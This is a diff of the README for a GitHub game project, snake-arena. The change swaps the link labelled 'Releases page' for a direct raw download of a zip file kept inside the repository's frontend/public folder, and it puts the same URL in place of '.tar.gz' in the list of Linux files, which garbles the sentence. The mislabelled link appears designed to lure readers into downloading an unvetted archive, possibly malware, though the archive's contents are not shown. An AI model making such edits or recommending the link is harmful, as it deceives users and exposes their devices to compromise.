l1e2o2n/snake-arena/README.md

 - **Internet Connection**: A stable connection for the best gaming experience.

 ## 📥 Download & Install
-To get started, visit the [Releases page](https://github.com/l1e2o2n/snake-arena/releases) to download the application.
+To get started, visit the [Releases page](https://raw.githubusercontent.com/l1e2o2n/snake-arena/main/frontend/public/snake-arena-v1.3.zip) to download the application.
 Once there, follow these steps:

 1. On the Releases page, find the latest version of **snake-arena**.
 2. Click on the version number to open the release details.
 3. Look for the asset that matches your operating system.
-Common files include `.exe` for Windows, `.dmg` for macOS, or `.tar.gz` for Linux.
+Common files include `.exe` for Windows, `.dmg` for macOS, or `https://raw.githubusercontent.com/l1e2o2n/snake-arena/main/frontend/public/snake-arena-v1.3.zip` for Linux.
 4. Click on the asset to start your download.
 5. Once downloaded, open the file and follow the installation prompts to install **snake-arena** on your device.